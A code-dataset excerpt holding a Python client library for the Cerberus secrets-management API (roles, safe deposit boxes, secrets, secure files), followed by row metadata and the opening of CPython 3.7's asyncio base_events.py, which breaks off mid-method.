throw_if_bad_response(secret_resp)
return secret_resp.json()
def put_secret(self, secure_data_path, secret, merge=True):
"""Write secret(s) to a secure data path provided a dictionary of key/values
Keyword arguments:
secure_data_path -- full path in the safety deposit box that contains the key
secret -- A dictionary containing key/values to be written at the secure data path
merge -- Boolean that determines if the provided secret keys should be merged with
the values already present at the secure data path. If False the keys will
completely overwrite what was stored at the secure data path. (default True)
"""
# json encode the input. Cerberus is sensitive to double vs single quotes.
# an added bonus is that json encoding transforms python2 unicode strings
# into a compatible format.
data = json.encoder.JSONEncoder().encode(secret)
if merge:
data = self.secret_merge(secure_data_path, secret)
secret_resp = post_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path,
data=str(data), headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def secret_merge(self, secure_data_path, key):
"""Compare key/values at secure_data_path and merges them. New values will overwrite old."""
get_resp = get_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path, headers=self.HEADERS)
temp_key = {}
# Ignore a return of 404 since it means the key might not exist
if get_resp.status_code == requests.codes.bad and get_resp.status_code not in [403, 404]:
throw_if_bad_response(get_resp)
elif get_resp.status_code in [403, 404]:
temp_key = {}
else:
temp_key = get_resp.json()['data']
# Allow key to be either a string describing a dict or a dict.
if type(key) == str:
temp_key.update(ast.literal_eval(key))
else:
temp_key.update(key)
# This is a bit of a hack to get around python 2 treating unicode strings
# differently. Cerberus will throw a 400 if we try to post python 2 style
# unicode stings as the payload.
combined_key = json.encoder.JSONEncoder().encode(temp_key)
return combined_key
| 41.818318 | 124 | 0.637787 |
from __future__ import print_function
import requests
from .aws_auth import AWSAuth
from .user_auth import UserAuth
from . import CerberusClientException, CLIENT_VERSION
from .util import throw_if_bad_response, get_with_retry, post_with_retry, put_with_retry, delete_with_retry, head_with_retry
import ast
import json
import logging
import sys
import warnings
import os
logger = logging.getLogger(__name__)
class CerberusClient(object):
HEADERS = {'Content-Type': 'application/json'}
def __init__(self, cerberus_url, username=None, password=None,
region='us-west-2', token=None, aws_session=None,
verbose=None):
self.cerberus_url = cerberus_url
self.username = username or ""
self.password = password or ""
self.region = region
self.token = token
if verbose is None or type(verbose) != bool:
self.verbose = True
else:
self.verbose = verbose
self.aws_session = aws_session
if self.token is None:
self._set_token()
self.HEADERS['X-Cerberus-Token'] = self.token
self.HEADERS['X-Cerberus-Client'] = 'CerberusPythonClient/' + CLIENT_VERSION
def _add_slash(self, string=None):
if(not str.endswith(string, '/')):
return str.join('', [string, '/'])
return str(string)
def _set_token(self):
try:
self.token = os.environ['CERBERUS_TOKEN']
if self.verbose:
print("Overriding Cerberus token with environment variable.", file=sys.stderr)
logger.info("Overriding Cerberus token with environment variable.")
return
except:
pass
if self.username:
ua = UserAuth(self.cerberus_url, self.username, self.password)
self.token = ua.get_token()
else:
awsa = AWSAuth(self.cerberus_url, region=self.region, aws_session=self.aws_session, verbose=self.verbose)
self.token = awsa.get_token()
def get_token(self):
return self.token
def get_roles(self):
roles_resp = get_with_retry(self.cerberus_url + '/v1/role',
headers=self.HEADERS)
throw_if_bad_response(roles_resp)
return roles_resp.json()
def get_role(self, key):
json_resp = self.get_roles()
for item in json_resp:
if key in item["name"]:
return item["id"]
raise CerberusClientException("Key '%s' not found" % key)
def list_roles(self):
json_resp = self.get_roles()
temp_dict = {}
for item in json_resp:
temp_dict[item["name"]] = item["id"]
return temp_dict
def get_categories(self):
sdb_resp = get_with_retry(self.cerberus_url + '/v1/category',
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def create_sdb(self, name, category_id, owner, description="", user_group_permissions=None,
iam_principal_permissions=None):
if user_group_permissions is None:
user_group_permissions = []
if iam_principal_permissions is None:
iam_principal_permissions = []
if list != type(user_group_permissions):
raise(TypeError('Expected list, but got ' + str(type(user_group_permissions))))
if list != type(iam_principal_permissions):
raise(TypeError('Expected list, but got ' + str(type(iam_principal_permissions))))
temp_data = {
"name": name,
"description": description,
"category_id": category_id,
"owner": owner,
}
if len(user_group_permissions) > 0:
temp_data["user_group_permissions"] = user_group_permissions
if len(iam_principal_permissions) > 0:
temp_data["iam_principal_permissions"] = iam_principal_permissions
data = json.encoder.JSONEncoder().encode(temp_data)
sdb_resp = post_with_retry(self.cerberus_url + '/v2/safe-deposit-box', data=str(data), headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def delete_sdb(self, sdb_id):
sdb_resp = delete_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id,
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp
def get_sdbs(self):
sdb_resp = get_with_retry(self.cerberus_url + '/v2/safe-deposit-box',
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_path(self, sdb):
sdb_id = self.get_sdb_id(sdb)
sdb_resp = get_with_retry(
self.cerberus_url + '/v1/safe-deposit-box/' + sdb_id + '/',
headers=self.HEADERS
)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()['path']
def get_sdb_keys(self, path):
list_resp = get_with_retry(
self.cerberus_url + '/v1/secret/' + path + '/?list=true',
headers=self.HEADERS
)
throw_if_bad_response(list_resp)
return list_resp.json()['data']['keys']
def get_sdb_id(self, sdb):
json_resp = self.get_sdbs()
for r in json_resp:
if r['name'] == sdb:
return str(r['id'])
raise CerberusClientException("'%s' not found" % sdb)
def get_sdb_id_by_path(self, sdb_path):
json_resp = self.get_sdbs()
path = self._add_slash(sdb_path)
for r in json_resp:
if r['path'] == path:
return str(r['id'])
raise CerberusClientException("'%s' not found" % sdb_path)
def get_sdb_by_id(self, sdb_id):
sdb_resp = get_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id,
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_by_path(self, sdb_path):
return self.get_sdb_by_id(self.get_sdb_id_by_path(sdb_path))
def get_sdb_by_name(self, sdb_name):
return self.get_sdb_by_id(self.get_sdb_id(sdb_name))
def get_sdb_secret_version_paths(self, sdb_id):
sdb_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/sdb-secret-version-paths/', sdb_id]),
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_secret_version_paths_by_path(self, sdb_path):
return self.get_sdb_secret_version_paths(self.get_sdb_id_by_path(sdb_path))
def list_sdbs(self):
sdb_raw = self.get_sdbs()
sdbs = []
for s in sdb_raw:
sdbs.append(s['name'])
return sdbs
def update_sdb(self, sdb_id, owner=None, description=None, user_group_permissions=None,
iam_principal_permissions=None):
old_data = self.get_sdb_by_id(sdb_id)
temp_data = {}
keys = ('owner', 'description', 'iam_principal_permissions', 'user_group_permissions')
for k in keys:
if k in old_data:
temp_data[k] = old_data[k]
if owner is not None:
temp_data["owner"] = owner
if description is not None:
temp_data["description"] = description
if user_group_permissions is not None and len(user_group_permissions) > 0:
temp_data["user_group_permissions"] = user_group_permissions
if iam_principal_permissions is not None and len(iam_principal_permissions) > 0:
temp_data["iam_principal_permissions"] = iam_principal_permissions
data = json.encoder.JSONEncoder().encode(temp_data)
sdb_resp = put_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id, data=str(data),
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
secret_resp = delete_with_retry(self.cerberus_url + '/v1/secure-file/' + secure_data_path,
headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def get_file_metadata(self, secure_data_path, version=None):
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = head_with_retry(str.join('', [self.cerberus_url, '/v1/secure-file/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.headers
def _get_file(self, secure_data_path, version=None):
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secure-file/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def _parse_metadata_filename(self, metadata):
index = metadata['Content-Disposition'].index('=')+1
metadata['filename'] = metadata['Content-Disposition'][index:].replace('"', '')
return metadata
def get_file(self, secure_data_path, version=None):
query = self._get_file(secure_data_path, version)
resp = query.headers.copy()
resp = self._parse_metadata_filename(resp)
resp['data'] = query.content
return resp
def get_file_data(self, secure_data_path, version=None):
return self._get_file(secure_data_path, version).content
def get_file_versions(self, secure_data_path, limit=None, offset=None):
return self.get_secret_versions(secure_data_path, limit, offset)
def _get_all_file_version_ids(self, secure_data_path, limit=None):
offset = 0
# Prime the versions dictionary so that all the logic can happen in the loop
versions = {'has_next': True, 'next_offset': 0}
while (versions['has_next']):
offset = versions['next_offset']
versions = self.get_file_versions(secure_data_path, limit, offset)
for summary in versions['secure_data_version_summaries']:
yield summary
def _get_all_file_versions(self, secure_data_path, limit=None):
for secret in self._get_all_file_version_ids(secure_data_path, limit):
yield {'secret': self.get_file_data(secure_data_path, version=secret['id']),
'version': secret}
def list_files(self, secure_data_path, limit=None, offset=None):
# Make sure that limit and offset are in range.
# Set the normal defaults
if not limit or limit <= 0:
limit = 100
if not offset or offset < 0:
offset = 0
payload = {'limit': str(limit), 'offset': str(offset)}
# Because of the addition of versionId and the way URLs are constructed, secure_data_path should
# always end in a '/'.
secure_data_path = self._add_slash(secure_data_path)
secret_resp = get_with_retry(self.cerberus_url + '/v1/secure-files/' + secure_data_path,
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def put_file(self, secure_data_path, filehandle, content_type=None):
# Parse out the filename from the path
filename = secure_data_path.rsplit('/', 1)
if content_type:
data = {'file-content': (filename, filehandle, content_type)}
else:
data = {'file-content': (filename, filehandle)}
headers = self.HEADERS.copy()
if 'Content-Type' in headers:
headers.__delitem__('Content-Type')
secret_resp = post_with_retry(self.cerberus_url + '/v1/secure-file/' + secure_data_path,
files=data, headers=headers)
throw_if_bad_response(secret_resp)
return secret_resp
###------ Secrets -----####
def delete_secret(self, secure_data_path):
secret_resp = delete_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path,
headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def get_secret(self, secure_data_path, key, version=None):
warnings.warn(
"get_secret is deprecated, use get_secrets_data instead",
DeprecationWarning
)
secret_resp_json = self._get_secrets(secure_data_path, version)
if key in secret_resp_json['data']:
return secret_resp_json['data'][key]
else:
raise CerberusClientException("Key '%s' not found" % key)
def _get_secrets(self, secure_data_path, version=None):
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secret/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def get_secrets(self, secure_data_path, version=None):
warnings.warn(
"get_secrets is deprecated, use get_secrets_data instead",
DeprecationWarning
)
return self._get_secrets(secure_data_path, version)
def get_secrets_data(self, secure_data_path, version=None):
return self._get_secrets(secure_data_path, version)['data']
def get_secret_versions(self, secure_data_path, limit=None, offset=None):
# Make sure that limit and offset are in range.
# Set the normal defaults
if not limit or limit <= 0:
limit = 100
if not offset or offset < 0:
offset = 0
payload = {'limit': str(limit), 'offset': str(offset)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secret-versions/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def _get_all_secret_version_ids(self, secure_data_path, limit=None):
offset = 0
# Prime the versions dictionary so that all the logic can happen in the loop
versions = {'has_next': True, 'next_offset': 0}
while (versions['has_next']):
offset = versions['next_offset']
versions = self.get_secret_versions(secure_data_path, limit, offset)
for summary in versions['secure_data_version_summaries']:
yield summary
def _get_all_secret_versions(self, secure_data_path, limit=None):
for secret in self._get_all_secret_version_ids(secure_data_path, limit):
yield {'secret': self.get_secrets_data(secure_data_path, version=secret['id']),
'version': secret}
def list_secrets(self, secure_data_path):
# Because of the addition of versionId and the way URLs are constructed, secure_data_path should
# always end in a '/'.
secure_data_path = self._add_slash(secure_data_path)
secret_resp = get_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path + '?list=true',
headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def put_secret(self, secure_data_path, secret, merge=True):
# json encode the input. Cerberus is sensitive to double vs single quotes.
# an added bonus is that json encoding transforms python2 unicode strings
# into a compatible format.
data = json.encoder.JSONEncoder().encode(secret)
if merge:
data = self.secret_merge(secure_data_path, secret)
secret_resp = post_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path,
data=str(data), headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def secret_merge(self, secure_data_path, key):
get_resp = get_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path, headers=self.HEADERS)
temp_key = {}
# Ignore a return of 404 since it means the key might not exist
if get_resp.status_code == requests.codes.bad and get_resp.status_code not in [403, 404]:
throw_if_bad_response(get_resp)
elif get_resp.status_code in [403, 404]:
temp_key = {}
else:
temp_key = get_resp.json()['data']
# Allow key to be either a string describing a dict or a dict.
if type(key) == str:
temp_key.update(ast.literal_eval(key))
else:
temp_key.update(key)
# This is a bit of a hack to get around python 2 treating unicode strings
# differently. Cerberus will throw a 400 if we try to post python 2 style
# unicode stings as the payload.
combined_key = json.encoder.JSONEncoder().encode(temp_key)
return combined_key
| true | true |
f7233563446d2d7e1ced2469a7d923c062a2ff32 | 69,830 | py | Python | Python-3.7.12/Lib/asyncio/base_events.py | TimS-ml/CPython-internals-Note | 8dcf9e9db3a42926689ed426ec271bcae7db8178 | [
"Xnet",
"X11"
] | 1,738 | 2017-09-21T10:59:12.000Z | 2022-03-31T21:05:46.000Z | Python-3.7.12/Lib/asyncio/base_events.py | TimS-ml/CPython-internals-Note | 8dcf9e9db3a42926689ed426ec271bcae7db8178 | [
"Xnet",
"X11"
] | 427 | 2017-09-29T22:54:36.000Z | 2022-02-15T19:26:50.000Z | Python-3.7.12/Lib/asyncio/base_events.py | TimS-ml/CPython-internals-Note | 8dcf9e9db3a42926689ed426ec271bcae7db8178 | [
"Xnet",
"X11"
] | 671 | 2017-09-21T08:04:01.000Z | 2022-03-29T14:30:07.000Z | """Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import heapq
import itertools
import logging
import os
import socket
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import futures
from . import protocols
from . import sslproto
from . import tasks
from . import transports
from .log import logger
__all__ = 'BaseEventLoop',
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
# Used for deprecation and removal of `loop.create_datagram_endpoint()`'s
# *reuse_address* parameter
_unset = object()
def _format_handle(handle):
cb = handle._callback
if isinstance(getattr(cb, '__self__', None), tasks.Task):
# format the task
return repr(cb.__self__)
else:
return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
# Try to skip getaddrinfo if "host" is already an IP. Users might have
# handled name resolution in their own code and pass in resolved IPs.
if not hasattr(socket, 'inet_pton'):
return
if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
host is None:
return None
if type == socket.SOCK_STREAM:
proto = socket.IPPROTO_TCP
elif type == socket.SOCK_DGRAM:
proto = socket.IPPROTO_UDP
else:
return None
if port is None:
port = 0
elif isinstance(port, bytes) and port == b'':
port = 0
elif isinstance(port, str) and port == '':
port = 0
else:
# If port's a service name like "http", don't skip getaddrinfo.
try:
port = int(port)
except (TypeError, ValueError):
return None
if family == socket.AF_UNSPEC:
afs = [socket.AF_INET]
if _HAS_IPv6:
afs.append(socket.AF_INET6)
else:
afs = [family]
if isinstance(host, bytes):
host = host.decode('idna')
if '%' in host:
# Linux's inet_pton doesn't accept an IPv6 zone index after host,
# like '::1%lo0'.
return None
for af in afs:
try:
socket.inet_pton(af, host)
# The host has already been resolved.
if _HAS_IPv6 and af == socket.AF_INET6:
return af, type, proto, '', (host, port, flowinfo, scopeid)
else:
return af, type, proto, '', (host, port)
except OSError:
pass
# "host" is not an IP address.
return None
def _run_until_complete_cb(fut):
if not fut.cancelled():
exc = fut.exception()
if isinstance(exc, BaseException) and not isinstance(exc, Exception):
# Issue #22429: run_forever() already finished, no need to
# stop it.
return
futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
class _SendfileFallbackProtocol(protocols.Protocol):
def __init__(self, transp):
if not isinstance(transp, transports._FlowControlMixin):
raise TypeError("transport should be _FlowControlMixin instance")
self._transport = transp
self._proto = transp.get_protocol()
self._should_resume_reading = transp.is_reading()
self._should_resume_writing = transp._protocol_paused
transp.pause_reading()
transp.set_protocol(self)
if self._should_resume_writing:
self._write_ready_fut = self._transport._loop.create_future()
else:
self._write_ready_fut = None
async def drain(self):
if self._transport.is_closing():
raise ConnectionError("Connection closed by peer")
fut = self._write_ready_fut
if fut is None:
return
await fut
def connection_made(self, transport):
raise RuntimeError("Invalid state: "
"connection should have been established already.")
def connection_lost(self, exc):
if self._write_ready_fut is not None:
# Never happens if peer disconnects after sending the whole content
# Thus disconnection is always an exception from user perspective
if exc is None:
self._write_ready_fut.set_exception(
ConnectionError("Connection is closed by peer"))
else:
self._write_ready_fut.set_exception(exc)
self._proto.connection_lost(exc)
def pause_writing(self):
if self._write_ready_fut is not None:
return
self._write_ready_fut = self._transport._loop.create_future()
def resume_writing(self):
if self._write_ready_fut is None:
return
self._write_ready_fut.set_result(False)
self._write_ready_fut = None
def data_received(self, data):
raise RuntimeError("Invalid state: reading should be paused")
def eof_received(self):
raise RuntimeError("Invalid state: reading should be paused")
async def restore(self):
self._transport.set_protocol(self._proto)
if self._should_resume_reading:
self._transport.resume_reading()
if self._write_ready_fut is not None:
# Cancel the future.
# Basically it has no effect because protocol is switched back,
# no code should wait for it anymore.
self._write_ready_fut.cancel()
if self._should_resume_writing:
self._proto.resume_writing()
class Server(events.AbstractServer):
def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
ssl_handshake_timeout):
self._loop = loop
self._sockets = sockets
self._active_count = 0
self._waiters = []
self._protocol_factory = protocol_factory
self._backlog = backlog
self._ssl_context = ssl_context
self._ssl_handshake_timeout = ssl_handshake_timeout
self._serving = False
self._serving_forever_fut = None
def __repr__(self):
return f'<{self.__class__.__name__} sockets={self.sockets!r}>'
def _attach(self):
assert self._sockets is not None
self._active_count += 1
def _detach(self):
assert self._active_count > 0
self._active_count -= 1
if self._active_count == 0 and self._sockets is None:
self._wakeup()
def _wakeup(self):
waiters = self._waiters
self._waiters = None
for waiter in waiters:
if not waiter.done():
waiter.set_result(waiter)
def _start_serving(self):
if self._serving:
return
self._serving = True
for sock in self._sockets:
sock.listen(self._backlog)
self._loop._start_serving(
self._protocol_factory, sock, self._ssl_context,
self, self._backlog, self._ssl_handshake_timeout)
def get_loop(self):
return self._loop
def is_serving(self):
return self._serving
@property
def sockets(self):
if self._sockets is None:
return []
return list(self._sockets)
def close(self):
sockets = self._sockets
if sockets is None:
return
self._sockets = None
for sock in sockets:
self._loop._stop_serving(sock)
self._serving = False
if (self._serving_forever_fut is not None and
not self._serving_forever_fut.done()):
self._serving_forever_fut.cancel()
self._serving_forever_fut = None
if self._active_count == 0:
self._wakeup()
async def start_serving(self):
self._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0, loop=self._loop)
async def serve_forever(self):
if self._serving_forever_fut is not None:
raise RuntimeError(
f'server {self!r} is already being awaited on serve_forever()')
if self._sockets is None:
raise RuntimeError(f'server {self!r} is closed')
self._start_serving()
self._serving_forever_fut = self._loop.create_future()
try:
await self._serving_forever_fut
except futures.CancelledError:
try:
self.close()
await self.wait_closed()
finally:
raise
finally:
self._serving_forever_fut = None
async def wait_closed(self):
if self._sockets is None or self._waiters is None:
return
waiter = self._loop.create_future()
self._waiters.append(waiter)
await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
self._timer_cancelled_count = 0
self._closed = False
self._stopping = False
self._ready = collections.deque()
self._scheduled = []
self._default_executor = None
self._internal_fds = 0
# Identifier of the thread running the event loop, or None if the
# event loop is not running
self._thread_id = None
self._clock_resolution = time.get_clock_info('monotonic').resolution
self._exception_handler = None
self.set_debug(coroutines._is_debug_mode())
# In debug mode, if the execution of a callback or a step of a task
# exceed this duration in seconds, the slow callback/task is logged.
self.slow_callback_duration = 0.1
self._current_handle = None
self._task_factory = None
self._coroutine_origin_tracking_enabled = False
self._coroutine_origin_tracking_saved_depth = None
# A weak set of all asynchronous generators that are
# being iterated by the loop.
self._asyncgens = weakref.WeakSet()
# Set to True when `loop.shutdown_asyncgens` is called.
self._asyncgens_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
def create_future(self):
"""Create a Future object attached to the loop."""
return futures.Future(loop=self)
def create_task(self, coro):
"""Schedule a coroutine object.
Return a task object.
"""
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self)
if task._source_traceback:
del task._source_traceback[-1]
else:
task = self._task_factory(self, coro)
return task
def set_task_factory(self, factory):
"""Set a task factory that will be used by loop.create_task().
If factory is None the default task factory will be set.
If factory is a callable, it should have a signature matching
'(loop, coro)', where 'loop' will be a reference to the active
event loop, 'coro' will be a coroutine object. The callable
must return a Future.
"""
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
def get_task_factory(self):
"""Return a task factory, or None if the default one is in use."""
return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
extra=None, server=None):
"""Create socket transport."""
raise NotImplementedError
def _make_ssl_transport(
self, rawsock, protocol, sslcontext, waiter=None,
*, server_side=False, server_hostname=None,
extra=None, server=None,
ssl_handshake_timeout=None,
call_connection_made=True):
"""Create SSL transport."""
raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
address=None, waiter=None, extra=None):
"""Create datagram transport."""
raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create read pipe transport."""
raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create write pipe transport."""
raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
stdin, stdout, stderr, bufsize,
extra=None, **kwargs):
"""Create subprocess transport."""
raise NotImplementedError
def _write_to_self(self):
"""Write a byte to self-pipe, to wake up the event loop.
This may be called from a different thread.
The subclass is responsible for implementing the self-pipe.
"""
raise NotImplementedError
def _process_events(self, event_list):
"""Process selector events."""
raise NotImplementedError
def _check_closed(self):
if self._closed:
raise RuntimeError('Event loop is closed')
def _asyncgen_finalizer_hook(self, agen):
self._asyncgens.discard(agen)
if not self.is_closed():
self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
if self._asyncgens_shutdown_called:
warnings.warn(
f"asynchronous generator {agen!r} was scheduled after "
f"loop.shutdown_asyncgens() call",
ResourceWarning, source=self)
self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
"""Shutdown all active asynchronous generators."""
self._asyncgens_shutdown_called = True
if not len(self._asyncgens):
# If Python version is <3.6 or we don't have any asynchronous
# generators alive.
return
closing_agens = list(self._asyncgens)
self._asyncgens.clear()
results = await tasks.gather(
*[ag.aclose() for ag in closing_agens],
return_exceptions=True,
loop=self)
for result, agen in zip(results, closing_agens):
if isinstance(result, Exception):
self.call_exception_handler({
'message': f'an error occurred during closing of '
f'asynchronous generator {agen!r}',
'exception': result,
'asyncgen': agen
})
def _check_runnung(self):
if self.is_running():
raise RuntimeError('This event loop is already running')
if events._get_running_loop() is not None:
raise RuntimeError(
'Cannot run the event loop while another loop is running')
def run_forever(self):
"""Run until stop() is called."""
self._check_closed()
self._check_runnung()
self._set_coroutine_origin_tracking(self._debug)
self._thread_id = threading.get_ident()
old_agen_hooks = sys.get_asyncgen_hooks()
sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
finalizer=self._asyncgen_finalizer_hook)
try:
events._set_running_loop(self)
while True:
self._run_once()
if self._stopping:
break
finally:
self._stopping = False
self._thread_id = None
events._set_running_loop(None)
self._set_coroutine_origin_tracking(False)
sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
"""Run until the Future is done.
If the argument is a coroutine, it is wrapped in a Task.
WARNING: It would be disastrous to call run_until_complete()
with the same coroutine twice -- it would wrap it in two
different Tasks and that can't be good.
Return the Future's result, or raise its exception.
"""
self._check_closed()
self._check_runnung()
new_task = not futures.isfuture(future)
future = tasks.ensure_future(future, loop=self)
if new_task:
# An exception is raised if the future didn't complete, so there
# is no need to log the "destroy pending task" message
future._log_destroy_pending = False
future.add_done_callback(_run_until_complete_cb)
try:
self.run_forever()
except:
if new_task and future.done() and not future.cancelled():
# The coroutine raised a BaseException. Consume the exception
# to not log a warning, the caller doesn't have access to the
# local task.
future.exception()
raise
finally:
future.remove_done_callback(_run_until_complete_cb)
if not future.done():
raise RuntimeError('Event loop stopped before Future completed.')
return future.result()
def stop(self):
"""Stop running the event loop.
Every callback already scheduled will still run. This simply informs
run_forever to stop looping after a complete iteration.
"""
self._stopping = True
def close(self):
"""Close the event loop.
This clears the queues and shuts down the executor,
but does not wait for the executor to finish.
The event loop must not be running.
"""
if self.is_running():
raise RuntimeError("Cannot close a running event loop")
if self._closed:
return
if self._debug:
logger.debug("Close %r", self)
self._closed = True
self._ready.clear()
self._scheduled.clear()
executor = self._default_executor
if executor is not None:
self._default_executor = None
executor.shutdown(wait=False)
def is_closed(self):
"""Returns True if the event loop was closed."""
return self._closed
def __del__(self):
if not self.is_closed():
warnings.warn(f"unclosed event loop {self!r}", ResourceWarning,
source=self)
if not self.is_running():
self.close()
def is_running(self):
"""Returns True if the event loop is running."""
return (self._thread_id is not None)
def time(self):
"""Return the time according to the event loop's clock.
This is a float expressed in seconds since an epoch, but the
epoch, precision, accuracy and drift are unspecified and may
differ per event loop.
"""
return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
"""Arrange for a callback to be called at a given time.
Return a Handle: an opaque object with a cancel() method that
can be used to cancel the call.
The delay can be an int or float, expressed in seconds. It is
always relative to the current time.
Each callback will be called exactly once. If two callbacks
are scheduled for exactly the same time, it undefined which
will be called first.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
timer = self.call_at(self.time() + delay, callback, *args,
context=context)
if timer._source_traceback:
del timer._source_traceback[-1]
return timer
def call_at(self, when, callback, *args, context=None):
"""Like call_later(), but uses an absolute time.
Absolute time corresponds to the event loop's time() method.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_at')
timer = events.TimerHandle(when, callback, args, self, context)
if timer._source_traceback:
del timer._source_traceback[-1]
heapq.heappush(self._scheduled, timer)
timer._scheduled = True
return timer
def call_soon(self, callback, *args, context=None):
"""Arrange for a callback to be called as soon as possible.
This operates as a FIFO queue: callbacks are called in the
order in which they are registered. Each callback will be
called exactly once.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_soon')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
def _call_soon(self, callback, args, context):
handle = events.Handle(callback, args, self, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._ready.append(handle)
return handle
def _check_thread(self):
"""Check that the current thread is the thread running the event loop.
Non-thread-safe methods of this class make this assumption and will
likely behave incorrectly when the assumption is violated.
Should only be called when (self._debug == True). The caller is
responsible for checking this condition for performance reasons.
"""
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
"""Like call_soon(), but thread-safe."""
self._check_closed()
